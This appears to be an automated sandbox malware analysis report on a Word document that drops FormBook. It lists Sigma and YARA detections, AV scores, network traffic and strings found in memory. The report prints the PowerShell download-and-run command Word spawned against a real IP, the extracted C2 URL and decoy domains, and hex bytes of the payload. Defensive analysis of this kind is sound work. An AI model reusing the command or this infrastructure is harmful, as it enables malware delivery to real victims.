Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 3664, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, ProcessId: 4220

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 3664, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, ProcessId: 4220

Sigma detected: Suspicious Bitsadmin Job via PowerShell

Show sources

Source: Process started

Author: Endgame, JHasenbusch (ported to sigma for oscd.community): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 3664, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, ProcessId: 4220

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.bucksnortneola.com/gw2/"], "decoy": ["kmampc.com", "swagsoldier.com", "achochapo.com", "nestymentemaestra.com", "rakuen-beans.info", "portaldainsolvencia.com", "nationaltodaytv.com", "monadiclab.com", "thebudgetfurnituredenver.com", "sifangzhouzi.com", "quangcaosonthach.com", "cbluebeltliveshop.com", "hyperrealmarketing.com", "dallasproducecompany.com", "zizhizhengshu.com", "becosyshe.com", "injectionhub.com", "wasteshelter.com", "gapegod.com", "danfrem.com", "emag.enterprises", "insomniaut.com", "margaretsboutiquenb.com", "bestmovies4k.com", "hsxytz.com", "veles.asia", "graphicoustic.com", "rzeroxi.com", "cristyleebennett.com", "vercoicsporno.club", "awdworldwide.com", "agrilast.com", "vineyardplaceseniorliving.com", "blancaholidaylets.com", "didixun.com", "localmiller.com", "gravityphysiotherapy.com", "couchtabledesktop.com", "cypresswoodsseniorliving.com", "mmdastro.com", "opportunitybsi.com", "deejspeaks.com", "alllivesmattertojesus.info", "clippingpathmask.com", "tuoitrechuatraisudoi.site", "mipecheritage.info", "acadeopolis.com", "52jnh.com", "thetrust.place", "highseachartersct.com", "booklarge.com", "kela-de.com", "ea-it-pantomath.com", "tricountyrr.com", "blackeye.online", "hidrovaco.com", "sleeplessreconnaissance.life", "newalbanyironworks.com", "scthxb.com", "bossssss.com", "isaostar.com", "pointredeem.com", "myfulfillmentproject.com", "toikawai.com"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Metadefender: Detection: 20%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Show sources

Source: RFL_PO 69002.doc	Virustotal: Detection: 15%			Perma Link
Source: RFL_PO 69002.doc	ReversingLabs: Detection: 21%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: RFL_PO 69002.doc

Joe Sandbox ML: detected

Source: 28.0.nothinglittle.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.2.nothinglittle.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.488460659.0000000006560000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: nothinglittle.exe, 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: nothinglittle.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.488460659.0000000006560000.00000002.00000001.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Source: winword.exe

Memory has grown: Private usage: 0MB later: 63MB

Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	9_2_03021500
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 4x nop then pop esi	28_2_004172E4
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 4x nop then pop edi	28_2_00417D55

Source: global traffic

TCP traffic: 192.168.2.3:49728 -> 31.210.20.45:80

Source: global traffic

TCP traffic: 192.168.2.3:49728 -> 31.210.20.45:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.bucksnortneola.com/gw2/

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 11 Jun 2021 05:41:48 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40Last-Modified: Thu, 10 Jun 2021 08:59:35 GMTETag: "823f0-5c4659c35de2e"Accept-Ranges: bytesContent-Length: 533488Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5e 07 69 d6 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 b0 07 00 00 4a 00 00 00 00 00 00 de cf 07 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 cf 07 00 53 00 00 00 00 e0 07 00 e8 46 00 00 00 00 00 00 00 00 00 00 00 fc 07 00 f0 27 00 00 00 40 08 00 0c 00 00 00 6c cf 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 af 07 00 00 20 00 00 00 b0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 46 00 00 00 e0 07 00 00 48 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 fa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 cf 07 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 b0 07 00 8c 1e 00 00 03 00 00 00 26 00 00 06 f8 2a 00 00 e8 85 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 31 00 00 06 2a 92 02 28 01 00 00 0a 28 02 00 00 0a 02 fe 06 03 00 00 06 73 03 00 00 0a 6f 04 00 00 0a 02 03 7d 01 00 00 04 2a 1b 30 02 00 46 00 00 00 01 00 00 11 28 05 00 00 0a 72 01 00 00 70 6f 06 00 00 0a 0a 73 07 00 00 0a 0b 06 07 6f 08 00 00 0a 28 02 00 00 0a 07 6f 09 00 00 0a 6f 0a 00 00 0a 0c de 14 07 2c 06 07 6f 0b 00 00 0a dc 06 2c 06 06 6f 0b 00 00 0a dc 08 2a 00 00 01 1c 00 00 02 00 16 00 1a 30 00 0a 00 00 00 00 02 00 10 00 2a 3a 00 0a 00 00 00 00 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 00 13 30 02 00 27 00 00 00 02 00 00 11 1f 16 0a 2b 0e 20 e8 03 00 00 28 0c 00 00 0a 06 17 59 0a 06 2d ef 73 0d 00 00 0a 6f 0e 00 00 0a 02 7b 01 00 00 04 2a 06 2a 1e 02 28 01 00 00 0a 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 3e 02 16 28 0e 00 00 06 02 16 28 10 00 00 06 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05

Source: Joe Sandbox View

ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE

Source: global traffic

HTTP traffic detected: GET /1xBet/RFL_0769002.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Thu, 10 Jun 2021 08:59:35 GMTUser-Agent: Microsoft BITS/7.8Host: 31.210.20.45

Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: explorer.exe, 0000001D.00000000.460487626.000000000E7C0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: RFL_PO 69002.doc	String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.ex
Source: RFL_PO 69002.doc	String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.ex9
Source: PowerShell_transcript.061544._jjnsaz8.20210611074123.txt.1.dr	String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exe
Source: powershell.exe, 00000001.00000002.281479605.00000000031D0000.00000004.00000040.sdmp, powershell.exe, 00000001.00000002.281688658.0000000004B10000.00000004.00000040.sdmp	String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exe-DestinationC:
Source: powershell.exe, 00000001.00000002.283225202.00000000050E1000.00000004.00000001.sdmp	String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exex
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460487626.000000000E7C0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSAExtendedValidationCodeSigningCA.crl0
Source: explorer.exe, 0000001D.00000000.482617274.0000000004E61000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://ocsp.comodoca.com0#
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000001.00000002.283225202.00000000050E1000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000001.00000002.282599228.0000000004FA1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
